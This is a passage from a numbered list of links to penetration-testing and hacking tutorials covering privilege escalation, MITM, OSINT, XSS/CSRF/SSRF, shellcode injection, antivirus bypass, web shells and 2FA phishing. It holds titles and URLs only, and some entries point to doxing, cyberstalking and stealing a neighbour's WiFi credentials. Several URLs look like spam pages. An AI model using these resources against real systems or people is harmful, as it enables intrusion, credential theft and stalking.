Labs:\n\n\n\n\nhttps://azeria-labs.com/privilege-escalation/\n\n\n\n\n-1683-Abusing SUDO (Linux Privilege Escalation):\n\n\n\nhttps://touhidshaikh.com/blog/?p=790\n\n\n\n-1684-Privilege Escalation - Linux:\n\n\n\nhttps://mysecurityjournal.blogspot.com/p/privilege-escalation-linux.html\n\n\n\n\n\n-1685-0day Linux Escalation Privilege Exploit Collection :\n\n\n\nhttps://blog.spentera.id/0day-linux-escalation-privilege-exploit-collection/\n\n\n\n\n-1686-Linux for Pentester: cp Privilege Escalation :\n\n\n\n\nhttps://hackin.co/articles/linux-for-pentester-cp-privilege-escalation.html\n\n\n\n\n-1687-Practical Privilege Escalation Using Meterpreter:\n\n\n\nhttps://ethicalhackingblog.com/practical-privilege-escalation-using-meterpreter/\n\n\n\n-1688-dirty_sock: Linux Privilege Escalation (via snapd):\n\n\n\nhttps://www.redpacketsecurity.com/dirty_sock-linux-privilege-escalation-via-snapd/\n\n\n\n\n-1689-Linux privilege escalation:\n\n\n\nhttps://jok3rsecurity.com/linux-privilege-escalation/\n\n\n\n\n-1690-The Complete Meterpreter Guide | Privilege Escalation & Clearing Tracks:\n\n\n\n\nhttps://hsploit.com/the-complete-meterpreter-guide-privilege-escalation-clearing-tracks/\n\n\n\n\n-1691-How to prepare for PWK/OSCP, a noob-friendly guide:\n\n\n\n\nhttps://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob\n\n\n\n\n-1692-Basic Linux privilege escalation by kernel exploits:\n\n\n\nhttps://greysec.net/showthread.php?tid=1355\n\n\n\n\n-1693-Linux mount without root :\n\n\n\nepaymentamerica.com/tozkwje/xlvkawj2.php?trjsef=linux-mount-without-root\n\n\n\n\n-1694-Linux Privilege Escalation Oscp:\n\n\n\n\nwww.condadorealty.com/2h442/linux-privilege-escalation-oscp.html\n\n\n\n\n-1695-Privilege Escalation Attack Tutorial:\n\n\n\nhttps://alhilalgroup.info/photography/privilege-escalation-attack-tutorial\n\n\n\n\n-1696-Oscp Bethany Privilege Escalation:\n\n\n\nhttps://ilustrado.com.br/i8v7/7ogf.php?veac=oscp-bethany-privilege-escalation\n\n\n\n\n-1697-Hacking a Website and Gaining Root Access using Dirty COW Exploit:\n\n\n\nhttps://ethicalhackers.club/hacking-website-gaining-root-access-using-dirtycow-exploit/\n\n\n\n\n-1698-Privilege Escalation - Linux · Total OSCP Guide:\n\n\n\nhttps://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html\n\n\n\n\n-1699-Linux advanced privilege escalation:\n\n\n\nhttps://www.slideshare.net/JameelNabbo/linux-advanced-privilege-escalation\n\n\n\n-1700-Local Linux privilege escalation overview:\n\n\n\nhttps://myexperiments.io/linux-privilege-escalation.html\n\n\n\n-1701-Windows Privilege Escalation Scripts & Techniques :\n\n\n\nhttps://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194\n\n\n\n\n-1702-Penetration Testing: Maintaining Access:\n\n\n\nhttps://resources.infosecinstitute.com/penetration-testing-maintaining-access/\n\n\n\n\n-1703-Kali Linux Maintaining Access :\n\n\n\nhttps://www.tutorialspoint.com/kali_linux/kali_linux_maintaining_access.htm\n\n\n\n-1704-Best Open Source Tools for Maintaining Access & Tunneling:\n\n\n\nhttps://n0where.net/maintaining-access\n\n\n\n-1705-Maintaining Access Part 1: Introduction and Metasploit Example:\n\n\n\nhttps://www.hackingloops.com/maintaining-access-metasploit/\n\n\n\n-1706-Maintaining Access - Ethical hacking and penetration testing:\n\n\n\nhttps://miloserdov.org/?cat=143\n\n\n\n-1707-Maintaining Access with Web Backdoors [Weevely]:\n\n\n\n\nhttps://www.yeahhub.com/maintaining-access-web-backdoors-weevely/\n\n\n\n\n\n-1708-Best Open Source MITM Tools: Sniffing & Spoofing:\n\n\n\nhttps://n0where.net/mitm-tools\n\n\n\n-1709-Cain and Abel - Man in the Middle (MITM) Attack Tool Explained:\n\n\n\nhttps://cybersguards.com/cain-and-abel-man-in-the-middle-mitm-attack-tool-explained/\n\n\n\n\n-1710-Man In The Middle Attack (MITM):\n\n\n\n\nhttps://medium.com/@nancyjohn.../man-in-the-middle-attack-mitm-114b53b2d987\n\n\n\n\n-1711-Real-World Man-in-the-Middle (MITM) Attack :\n\n\n\nhttps://ieeexplore.ieee.org/document/8500082\n\n\n\n-1712-The Ultimate Guide to Man in the Middle Attacks :\n\n\n\n\nhttps://doubleoctopus.com/blog/the-ultimate-guide-to-man-in-the-middle-mitm-attacks-and-how-to-prevent-them/\n\n\n\n\n\n-1713-How to Conduct ARP Spoofing for MITM Attacks:\n\n\n\nhttps://tutorialedge.net/security/arp-spoofing-for-mitm-attack-tutorial/\n\n\n\n-1714-How To Do A Man-in-the-Middle Attack Using ARP Spoofing & Poisoning:\n\n\n\nhttps://medium.com/secjuice/man-in-the-middle-attack-using-arp-spoofing-fa13af4f4633\n\n\n\n-1715-Ettercap and middle-attacks tutorial :\n\n\n\n\nhttps://pentestmag.com/ettercap-tutorial-for-windows/\n\n\n\n-1716-How To Setup A Man In The Middle Attack Using ARP Poisoning:\n\n\n\nhttps://online-it.nu/how-to-setup-a-man-in-the-middle-attack-using-arp-poisoning/\n\n\n\n-1717-Intro to Wireshark and Man in the Middle Attacks:\n\n\n\n\nhttps://www.commonlounge.com/discussion/2627e25558924f3fbb6e03f8f912a12d\n\n\n\n-1718-MiTM Attack with Ettercap:\n\n\n\nhttps://www.hackers-arise.com/single-post/2017/08/28/MiTM-Attack-with-Ettercap\n\n\n\n-1719-Man in the Middle Attack with Websploit Framework:\n\n\n\nhttps://www.yeahhub.com/man-middle-attack-websploit-framework/\n\n\n\n\n-1720-SSH MitM Downgrade :\n\n\n\nhttps://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade\n\n\n\n-1721-How to use Netcat for Listening, Banner Grabbing and Transferring Files:\n\n\n\nhttps://www.yeahhub.com/use-netcat-listening-banner-grabbing-transferring-files/\n\n\n\n\n-1722-Powershell port scanner and banner grabber:\n\n\n\nhttps://www.linkedin.com/pulse/powershell-port-scanner-banner-grabber-jeremy-martin/\n\n\n\n-1723-What is banner grabbing attack:\n\n\n\nhttps://rxkjftu.ga/sport/what-is-banner-grabbing-attack.php\n\n\n\n\n-1724-Network penetration testing:\n\n\n\nhttps://guif.re/networkpentest\n\n\n\n-1725-NMAP Cheatsheet:\n\n\n\nhttps://redteamtutorials.com/2018/10/14/nmap-cheatsheet/\n\n\n\n-1726-How To Scan a Network With Nmap:\n\n\n\nhttps://online-it.nu/how-to-scan-a-network-with-nmap/\n\n\n\n\n-1727-Hacking Metasploitable : Scanning and Banner grabbing:\n\n\n\nhttps://hackercool.com/2015/11/hacking-metasploitable-scanning-banner-grabbing/\n\n\n\n-1728-Penetration Testing of an FTP Server:\n\n\n\nhttps://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b\n\n\n\n\n-1729-Nmap Usage & Cheet-Sheet:\n\n\n\nhttps://aerroweb.wordpress.com/2018/03/14/namp-cheat-sheet/\n\n\n\n\n-1730-Discovering SSH Host Keys with NMAP:\n\n\n\nhttps://mwhubbard.blogspot.com/2015/03/discovering-ssh-host-keys-with-nmap.html\n\n\n\n\n-1731-Banner Grabbing using Nmap & NetCat - Detailed Explanation:\n\n\n\nhttps://techincidents.com/banner-grabbing-using-nmap-netcat\n\n\n\n\n-1732-Nmap – (Vulnerability Discovery):\n\n\n\nhttps://crazybulletctfwriteups.wordpress.com/2015/09/5/nmap-vulnerability-discovery/\n\n\n\n\n\n-1733-Penetration Testing on MYSQL (Port 3306):\n\n\n\nhttps://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/\n\n\n\n-1774-Password Spraying - Infosec Resources :\n\n\n\nhttps://resources.infosecinstitute.com/password-spraying/\n\n\n\n-1775-Password Spraying- Common mistakes and how to avoid them:\n\n\n\nhttps://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b\n\n\n\n\n-1776-Password Spraying Tutorial:\n\n\n\nhttps://attack.stealthbits.com/password-spraying-tutorial-defense\n\n\n\n\n-1777-password spraying Archives:\n\n\n\nhttps://www.blackhillsinfosec.com/tag/password-spraying/\n\n\n\n-1778-The 21 Best Email Finding Tools::\n\n\n\nhttps://beamery.com/blog/find-email-addresses\n\n\n\n\n-1779-OSINT Primer: People (Part 2):\n\n\n\nhttps://0xpatrik.com/osint-people/\n\n\n\n\n-1780-Discovering Hidden Email Gateways with OSINT Techniques:\n\n\n\nhttps://blog.ironbastion.com.au/discovering-hidden-email-servers-with-osint-part-2/\n\n\n\n\n-1781-Top 20 Data Reconnaissance and Intel Gathering Tools :\n\n\n\nhttps://securitytrails.com/blog/top-20-intel-tools\n\n\n\n\n-1782-101+ OSINT Resources for Investigators [2019]:\n\n\n\nhttps://i-sight.com/resources/101-osint-resources-for-investigators/\n\n\n\n-1783-Digging Through Someones Past Using OSINT:\n\n\n\nhttps://nullsweep.com/digging-through-someones-past-using-osint/\n\n\n\n\n-1784-Gathering Open Source Intelligence:\n\n\n\nhttps://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05\n\n\n\n-1785-How to Locate the Person Behind an Email Address:\n\n\n\nhttps://www.sourcecon.com/how-to-locate-the-person-behind-an-email-address/\n\n\n\n\n-1786-Find hacked email addresses and check breach mails:\n\n\n\nhttps://www.securitynewspaper.com/2019/01/16/find-hacked-email-addresses/\n\n\n\n\n-1787-A Pentester's Guide - Part 3 (OSINT, Breach Dumps, & Password :\n\n\n\nhttps://delta.navisec.io/osint-for-pentesters-part-3-password-spraying-methodology/\n\n\n\n\n-1788-Top 10 OSINT Tools/Sources for Security Folks:\n\n\n\nwww.snoopysecurity.github.io/osint/2018/08/02/10_OSINT_for_security_folks.html\n\n\n\n\n-1789-Top 5 Open Source OSINT Tools for a Penetration Tester:\n\n\n\nhttps://www.breachlock.com/top-5-open-source-osint-tools/\n\n\n\n\n-1790-Open Source Intelligence tools for social media: my own list:\n\n\n\nhttps://www.andreafortuna.org/2017/03/20/open-source-intelligence-tools-for-social-media-my-own-list/\n\n\n\n\n-1791-Red Teaming: I can see you! Insights from an InfoSec expert :\n\n\n\n\nhttps://www.perspectiverisk.com/i-can-see-you-osint/\n\n\n\n\n-1792-OSINT Playbook for Recruiters:\n\n\n\nhttps://amazinghiring.com/osint-playbook/\n\n\n\n\n-1793- Links for Doxing, Personal OSInt, Profiling, Footprinting, Cyberstalking:\n\n\n\n\nhttps://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking\n\n\n\n-1794-Open Source Intelligence Gathering 201 (Covering 12 additional techniques):\n\n\n\nhttps://blog.appsecco.com/open-source-intelligence-gathering-201-covering-12-additional-techniques-b76417b5a544?gi=2afe435c630a\n\n\n\n\n-1795-Online Investigative Tools for Social Media Discovery and Locating People:\n\n\n\nhttps://4thetruth.info/colorado-private-investigator-online-detective-social-media-and-online-people-search-online-search-tools.html\n\n\n\n\n-1796-Expanding Skype Forensics with OSINT: Email Accounts:\n\n\n\n\nhttp://www.automatingosint.com/blog/2016/05/expanding-skype-forensics-with-osint-email-accounts/\n\n\n\n\n-1798-2019 OSINT Guide:\n\n\n\nhttps://www.randhome.io/blog/2019/01/05/2019-osint-guide/\n\n\n\n-1799-OSINT - Passive Recon and Discovery of Assets:\n\n\nhttps://0x00sec.org/t/osint-passive-recon-and-discovery-of-assets/6715\n\n\n\n-1800-OSINT With Datasploit:\n\n\n\nhttps://dzone.com/articles/osint-with-datasploit\n\n\n\n\n-1801-Building an OSINT Reconnaissance Tool from Scratch:\n\n\n\nhttps://medium.com/@SundownDEV/phone-number-scanning-osint-recon-tool-6ad8f0cac27b\n\n\n\n\n-1802-Find Identifying Information from a Phone Number Using OSINT Tools:\n\n\n\nhttps://null-byte.wonderhowto.com/how-to/find-identifying-information-from-phone-number-using-osint-tools-0195472/\n\n\n\n-1803-Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step):\n\n\n\nhttps://www.securitynewspaper.com/2019/05/02/find-details-of-any-mobile-number-email-id-ip-address-in-the-world-step-by-step/\n\n\n\n\n-1804-Investigative tools for finding people online and keeping yourself safe:\n\n\n\nhttps://ijnet.org/en/story/investigative-tools-finding-people-online-and-keeping-yourself-safe\n\n\n\n-1805- Full text of ""The Hacker Playbook 2 Practical Guide To Penetration Testing By Peter Kim"":\n\n\n\nhttps://archive.org/stream/TheHackerPlaybook2PracticalGuideToPenetrationTestingByPeterKim/The%20Hacker%20Playbook%202%20-%20Practical%20Guide%20To%20Penetration%20Testing%20By%20Peter%20Kim_djvu.txt\n\n\n\n-1806-The Internet Archive offers over 15,000,000 freely downloadable books and texts. There is also a collection of 550,000 modern eBooks that may be borrowed by anyone with a free archive.org account:\n\n\n\nhttps://archive.org/details/texts?and%5B%5D=hacking&sin=\n\n\n\n-1807-Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!:\n\n\n\nhttps://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326\n\n\n\n-1808-How to Pass OSCP Like Boss:\n\n\n\nhttps://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d\n\n\n\n\n-1809-Deploy a private Burp Collaborator Server in Azure:\n\n\n\n https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70\n \n \n \n \n -1810-Using Shodan Better Way! :):\n \n \n \n https://medium.com/bugbountywriteup/using-shodan-better-way-b40f330e45f6\n \n \n \n \n-1811-How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty:\n \n \n \n https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-728c5242a115 \n \n \n \n \n -1812-How we got LFI in apache Drill (Recon like a boss)::\n \n \n \n \n \n https://medium.com/bugbountywriteup/how-we-got-lfi-in-apache-drill-recon-like-a-boss-6f739a79d87d\n \n \n \n \n-1813-Chaining Self XSS with UI Redressing is Leading to Session Hijacking:\n \n \n \n \n https://medium.com/bugbountywriteup/chaining-self-xss-with-ui-redressing-is-leading-to-session-hijacking-pwn-users-like-a-boss-efb46249cd14\n \n \n \n \n-1814-Week in OSINT #2019–19:\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-18-1975fb8ea43a4\n\n\n-1814-Week in OSINT #2019–02:\n\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f\n\n\n\n-1815-Week in OSINT #2019–24:\n\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-24-4fcd17ca908f\n\n\n\n\n-1816-Page Admin Disclosure | Facebook Bug Bounty 2019:\n\n\n\n\nhttps://medium.com/bugbountywriteup/page-admin-disclosure-facebook-bug-bounty-2019-ee9920e768eb\n\n\n\n\n\n-1817-XSS in Edmodo within 5 Minute (My First Bug Bounty):\n\n\n\n\nhttps://medium.com/@valakeyur/xss-in-edmodo-within-5-minute-my-first-bug-bounty-889e3da6167d\n\n\n\n\n-1818-Collection Of Bug Bounty Tip-Will Be updated daily:\n\n\n\n\nhttps://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248\n\n\n\n\n\n-1819-A Unique XSS Scenario in SmartSheet || $1000 bounty.:\n\n\n\n\nhttps://medium.com/@rohanchavan/a-unique-xss-scenario-1000-bounty-347f8f92fcc6\n\n\n\n\n-1820-How I found a simple bug in Facebook without any Test:\n\n\n\nhttps://medium.com/bugbountywriteup/how-i-found-a-simple-bug-in-facebook-without-any-test-3bc8cf5e2ca2\n\n\n\n\n-1821-Facebook BugBounty — Disclosing page members:\n\n\n\nhttps://medium.com/@tnirmalz/facebook-bugbounty-disclosing-page-members-1178595cc520\n\n\n\n\n\n-1822-Don’t underestimates the Errors They can provide good $$$ Bounty!:\n\n\n\n\nhttps://medium.com/@noob.assassin/dont-underestimates-the-errors-they-can-provide-good-bounty-d437ecca6596\n\n\n\n-1823-Django and Web Security Headers:\n\n\n\nhttps://medium.com/@ksarthak4ever/django-and-web-security-headers-d72a9e54155e\n\n\n\n\n-1824-Weaponising Staged Cross-Site Scripting (XSS) Payloads:\n\n\n\n\nhttps://medium.com/redteam/weaponising-staged-cross-site-scripting-xss-payloads-7b917f605800\n\n\n\n\n-1825-How I was able to Bypass XSS Protection on HackerOne’s Private Program:\n\n\n\nhttps://medium.com/@vulnerabilitylabs/how-i-was-able-to-bypass-xss-protection-on-hackerones-private-program-8914a31339a9\n\n\n\n\n\n-1826-XSS in Microsoft subdomain:\n\n\n\nhttps://blog.usejournal.com/xss-in-microsoft-subdomain-81c4e46d6631\n\n\n\n\n-1827-How Angular Protects Us From XSS Attacks?:\n\n\n\nhttps://medium.com/hackernoon/how-angular-protects-us-from-xss-attacks-3cb7a7d49d95\n\n\n\n\n\n-1828-[FUN] Bypass XSS Detection WAF:\n\n\n\n\nhttps://medium.com/soulsecteam/fun-bypass-xss-detection-waf-cabd431e030e\n\n\n\n\n\n-1829-Bug Hunting Methodology(Part-2):\n\n\n\n\nhttps://blog.usejournal.com/bug-hunting-methodology-part-2-5579dac06150\n\n\n\n\n\n-1830-Learn Web Application Penetration Testing:\n\n\n\n\nhttps://blog.usejournal.com/web-application-penetration-testing-9fbf7533b361\n\n\n\n\n\n-1831-“Exploiting a Single Parameter”:\n\n\n\nhttps://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523\n\n\n\n-1832-CORS To CSRF Attack:\n\n\n\nhttps://blog.usejournal.com/cors-to-csrf-attack-c33a595d441\n\n\n\n\n-1833-Account Takeover Using CSRF(json-based):\n\n\n\nhttps://medium.com/@shub66452/account-takeover-using-csrf-json-based-a0e6efd1bffc\n\n\n\n-1834-Bypassing Anti-CSRF with Burp Suite Session Handling:\n\n\nhttps://bestestredteam.com/tag/anti-csrf/\n\n\n\n-1835-10 Methods to Bypass Cross Site Request Forgery (CSRF):\n\n\n\nhttps://haiderm.com/10-methods-to-bypass-cross-site-request-forgery-csrf/\n\n\n\n\n\n-1836-Exploiting CSRF on JSON endpoints with Flash and redirects:\n\n\n\n\nhttps://medium.com/p/681d4ad6b31b\n\n\n\n\n-1837-Finding and exploiting Cross-site request forgery (CSRF):\n\n\n\nhttps://securityonline.info/finding-exploiting-cross-site-request-forgery/\n\n\n\n-1838-Hacking Facebook accounts using CSRF in Oculus-Facebook integration:\n\n\n\n\nhttps://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf\n\n\n\n\n-1839-Synchronizer Token Pattern: No more tricks:\n\n\n\nhttps://medium.com/p/d2af836ccf71\n\n\n\n\n-1840-The $12,000 Intersection between Clickjacking, XSS, and Denial of Service:\n\n\n\n\nhttps://medium.com/@imashishmathur/the-12-000-intersection-between-clickjacking-xss-and-denial-of-service-f8cdb3c5e6d1\n\n\n-1841-XML External Entity(XXE):\n\n\nhttps://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b\n\n\n\n-1842-XXE Attacks— Part 1: XML Basics:\n\n\n\nhttps://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26\n\n\n\n-1843-From XXE to RCE with PHP/expect — The Missing Link:\n\n\n\n\n\nhttps://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7\n\n\n\n\n\n-1844-My first XML External Entity (XXE) attack with .gpx file:\n\n\n\n\nhttps://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98\n\n\n\n\n\n\n-1845-Open Redirects & Security Done Right!:\n\n\n\n\nhttps://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496\n\n\n\n\n-1846-XXE on Windows system …then what ??:\n\n\n\n\n\nhttps://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745\n\n\n\n\n\n-1847-Unauthenticated Blind SSRF in Oracle EBS CVE-2018-3167:\n\n\n\n\nhttps://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145\n\n\n\n\n\n\n-1848-SVG XLink SSRF fingerprinting libraries version:\n\n\n\n\nhttps://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c\n\n\n\n\n\n-1849-What is XML Injection Attack:\n\n\n\n\n\nhttps://medium.com/@dahiya.aj12/what-is-xml-injection-attack-279691bd00b6\n\n\n\n\n\n\n\n\n-1850-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1:\n\n\n\n\nhttps://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978\n\n\n\n\n-1851-Penetration Testing Introduction: Scanning & Reconnaissance:\n\n\nhttps://medium.com/cyberdefenders/penetration-testing-introduction-scanning-reconnaissance-f865af0761f\n\n\n\n\n-1852-Beginner’s Guide to recon automation.:\n\n\n\nhttps://medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb\n\n\n\n\n\n-1853-Red Teamer’s Guide to Pulse Secure SSL VPN:\n\n\n\nhttps://medium.com/bugbountywriteup/pulse-secure-ssl-vpn-post-auth-rce-to-ssh-shell-2b497d35c35b\n\n\n\n\n\n-1854-CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection:\n\n\n\nhttps://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787\n\n\n\n\n-1855-How I harvested Facebook credentials via free wifi?:\n\n\n\nhttps://medium.com/bugbountywriteup/how-i-harvested-facebook-credentials-via-free-wifi-5da6bdcae049\n\n\n\n\n-1856-How to hack any Payment Gateway?:\n\n\n\n\nhttps://medium.com/bugbountywriteup/how-to-hack-any-payment-gateway-1ae2f0c6cbe5\n\n\n\n\n-1857-How I hacked into my neighbour’s WiFi and harvested login credentials?:\n\n\n\n\nhttps://medium.com/bugbountywriteup/how-i-hacked-into-my-neighbours-wifi-and-harvested-credentials-487fab106bfc\n\n\n\n\n-1858-What do Netcat, SMTP and self XSS have in common? Stored XSS:\n\n\n\n\nhttps://medium.com/bugbountywriteup/what-do-netcat-smtp-and-self-xss-have-in-common-stored-xss-a05648b72002\n\n\n\n\n\n-1859-1-Click Account Takeover in Virgool.io — a Nice Case Study:\n\n\n\nhttps://medium.com/bugbountywriteup/1-click-account-takeover-in-virgool-io-a-nice-case-study-6bfc3cb98ef2\n\n\n\n\n\n-1860-Digging into Android Applications — Part 1 — Drozer + Burp:\n\n\n\n\nhttps://medium.com/bugbountywriteup/digging-android-applications-part-1-drozer-burp-4fd4730d1cf2\n\n\n\n\n-1861-Linux for Pentester: APT Privilege Escalation:\n\n\n\nhttps://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation\n\n\n\n\n\n-1862-Linux for Pentester : ZIP Privilege Escalation:\n\n\n\nhttps://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation\n\n\n\n\n-1863-Koadic - COM Command & Control Framework:\n\n\n\nhttps://www.hackingarticles.in/koadic-com-command-control-framework\n\n\n\n\n\n-1864-Configure Sqlmap for WEB-GUI in Kali Linux :\n\n\n\n\nhttps://www.hackingarticles.in/configure-sqlmap-for-web-gui-in-kali-linux\n\n\n\n\n\n-1865-Penetration Testing:\n\n\n\nhttps://www.hackingarticles.in/Penetration-Testing\n\n\n-1866-Buffer Overflow Examples, Code execution by shellcode :\n\n\nhttps://0xrick.github.io/binary-exploitation/bof5\n\n\n\n-1867-Dynamic Shellcode Execution:\n\n\n\nhttps://www.countercept.com/blog/dynamic-shellcode-execution\n\n\n\n\n-1868-JSC Exploits:\n\n\n\n\n-https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html\n\n\n\n\n-1869-Injecting Into The Hunt:\n\n\n\n\nhttps://jsecurity101.com/2019/Injecting-Into-The-Hunt\n\n\n\n\n-1870-Bypassing Antivirus with Golang:\n\n\n\nhttps://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher.it\n\n\n\n\n\n-1871-Windows Process Injection: Print Spooler:\n\n\n\nhttps://modexp.wordpress.com/2019/03/07/process-injection-print-spooler\n\n\n\n\n-1872-Inject Shellcode Into Memory Using Unicorn :\n\n\n\nhttps://ethicalhackingguru.com/inject-shellcode-memory-using-unicorn\n\n\n\n\n-1873-Macros and More with SharpShooter v2.0:\n\n\n\nhttps://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0\n\n\n\n\n-1874-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example:\n\n\n\nhttps://www.guru99.com/fuzz-testing\n\n\n\n\n-1875-Introduction to File Format Fuzzing & Exploitation:\n\n\n\nhttps://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3\n\n-1876-Hacking a social media account and safeguarding it:\n\nhttps://medium.com/@ujasdhami79/hacking-a-social-media-account-and-safeguarding-it-e5f69adf62d7\n\n-1877-OTP Bypass on India’s Biggest Video Sharing Site:\n\nhttps://medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89\n\n-1879-Getting Root on macOS via 3rd Party Backup Software:\n\nhttps://medium.com/tenable-techblog/getting-root-on-macos-via-3rd-party-backup-software-b804085f0c9\n\n\n-1880-How to Enumerate MYSQL Database using Metasploit:\n\n\nhttps://ehacking.net/2020/03/how-to-enumerate-mysql-database-using-metasploit-kali-linux-tutorial.html\n\n\n-1881-Exploiting Insecure Firebase Database!\n\n\nhttps://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty\n\n\n-1882-Penetration Testing - Complete Guide:\n\nhttps://softwaretestinghelp.com/penetration-testing-guide\n\n\n-1883-How To Upload A PHP Web Shell On WordPress Site:\n\n\nhttps://1337pwn.com/how-to-upload-php-web-shell-on-wordpress-site\n\n\n-1884-Mimikatz tutorial: How it hacks Windows passwords, credentials:\n\n\nhttps://searchsecurity.techtarget.com/tutorial/Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials\n\n\n\n-1885-Ethical hacking: Lateral movement techniques:\n\n\nhttps://securityboulevard.com/2019/09/ethical-hacking-lateral-movement-techniques\n\n\n-1886-A Pivot Cheatsheet for Pentesters:\n\n\nhttp://nullsweep.com/pivot-cheatsheet-for-pentesters\n\n\n-1887-What to Look for When Reverse Engineering Android Apps:\n\n\nhttp://nowsecure.com/blog/2020/02/26/what-to-look-for-when-reverse-engineering-android-apps\n\n\n\n-1888-Modlishka: Advance Phishing to Bypass 2 Factor Auth:\n\n\nhttp://crackitdown.com/2019/02/modlishka-kali-linux.html\n\n\n-1889-Bettercap Usage Examples (Overview, Custom setup, Caplets ):\n\n\nwww.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets\n\n\n-1890-The Complete Hashcat Tutorial:\n\n\nhttps://ethicalhackingguru.com/the-complete-hashcat-tutorial\n\n\n\n-1891-Wireless Wifi Penetration Testing Hacker Notes:\n\n\nhttps://executeatwill.com/2020/01/05/Wireless-Wifi-Penetration-Testing-Hacker-Notes\n\n\n-1892-#BugBounty writeups:\n\nhttps://pentester.land/list-of-bug-bounty-writeups.html\n\n\n\n-1893-Kerberoasting attack:\n\n\nhttps://en.hackndo.com/kerberoasting\n\n\n-1894-A Pentester's Guide - Part 2 (OSINT - LinkedIn is not just for jobs):\n\n\nhttps://delta.navisec.io/osint-for-pentesters-part-2-linkedin-is-not-just-for-jobs\n\n\n-1895-Radare2 cutter tutorial:\n\nhttp://cousbox.com/axflw/radare2-cutter-tutorial.html\n\n\n-1896-Cracking Password Hashes with Hashcat:\n\n\nhttp://hackingvision.com/2020/03/22/cracking-password-hashes-hashcat\n\n\n\n-1897-From CSRF to RCE and WordPress-site takeover CVE-2020-8417:\n\n\nhttp://blog.wpsec.com/csrf-to-rce-wordpress\n\n\n-1898-Best OSINT Tools:\n\n\nhttp://pcwdld.com/osint-tools-and-software\n\n\n\n-1899-Metasploit Exploitation Tool 2020:\n\n\nhttp://cybervie.com/blog/metasploit-exploitation-tool\n\n\n\n-1900-How to exploit CVE-2020-7961:\n\n\nhttps://synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html\n\n\n\n-1901-PowerShell for Pentesters:\n\n\nhttps://varonis.com/blog/powershell-for-pentesters\n\n\n-1902-Android Pentest Tutorial:\n\n\nhttps://packetstormsecurity.com/files/156432/Android-Pentest-Tutorial-Step-By-Step.html\n\n\n\n-1903-Burp Suite Tutorial:\n\n\nhttps://pentestgeek.com/web-applications/burp-suite-tutorial-1\n\n\n\n-1904-Company Email Enumeration + Breached Email Finder:\n\n\n\nhttps://metalkey.github.io/company-email-enumeration--breached-email-finder.html\n\n\n-1905-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-1906-Active Directory Exploitation Cheat Sheet:\nA cheat sheet that contains common enumeration and attack methods for Windows Active Directory.\n\n\nhttps://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#using-bloodhound \n\n\n\n-1907-Advanced Hacking Tutorials Collection:\n\n\nhttps://yeahhub.com/advanced-hacking-tutorials-collection\n\n\n\n-1908-Persistence – DLL Hijacking:\n\n\nhttps://pentestlab.blog/2020/03/04/persistence-dll-hijacking\n\n\n\n-1909-Brute force and dictionary attacks: A cheat sheet:\n\n\nhttps://techrepublic.com/article/brute-force-and-dictionary-attacks-a-cheat-sheet\n\n\n\n\n\n\n-1910-How to use Facebook for Open Source Investigation:\n\n\nhttps://securitynewspaper.com/2020/03/11/how-to-use-facebook-for-open-source-investigation-osint\n\n\n-1911-tcpdump Cheat Sheet:\n\n\nhttps://comparitech.com/net-admin/tcpdump-cheat-sheet\n\n\n\n-1912-Windows Post exploitation recon with 